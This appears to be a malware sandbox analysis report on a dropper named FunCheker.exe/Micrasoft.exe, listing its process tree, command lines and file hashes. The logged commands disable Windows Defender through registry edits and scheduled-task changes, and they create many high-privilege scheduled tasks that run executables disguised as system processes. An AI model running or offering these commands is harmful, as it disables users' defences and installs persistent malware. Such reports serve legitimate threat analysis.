PID 3228 wrote to memory of 316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4952 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 4952 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 4952 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 3228 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 3484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 3916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3228 wrote to memory of 4600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" "

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

"C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Pictures\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\InstallAgent.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Users\Public\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\uk-UA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\images\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Users\Public\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 12 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "comcommon" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "comcommonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\comcommon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/4756-0-0x00007FFA85573000-0x00007FFA85574000-memory.dmp

memory/4756-1-0x0000000000160000-0x000000000034C000-memory.dmp

memory/4756-4-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

MD5 4eab8d478ffd36a7d96ca9a8512cc447
SHA1 cddb1b2d3656d62cdcc67125ec29f2bf83c5f346
SHA256 a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a
SHA512 c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6

memory/4756-19-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FunChecker .bat

MD5 42afdea7c75bc9074a22ff1be2787959
SHA1 24bc20691a1e99e2cf0b2bca78694701fa47720a
SHA256 3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2
SHA512 d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

C:\Users\Admin\AppData\Local\Temp\avdisable.bat

MD5 4c35b71d2d89c8e8eb773854085c56ea
SHA1 ede16731e61348432c85ef13df4beb2be8096d9b
SHA256 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512 a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

C:\Users\Admin\AppData\Local\Temp\clear_av.bat

MD5 48d1db006fe2ae378b0f7efd561d7e56
SHA1 63df10216f0ad81d1d42dd2fc8c4483be5d077fc
SHA256 65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a
SHA512 079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe

MD5 9a1c593488c39a17105a4ea268b40a0e
SHA1 90f73ef3dd6c79442f27f481957e60f0deaa3ab4
SHA256 9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5
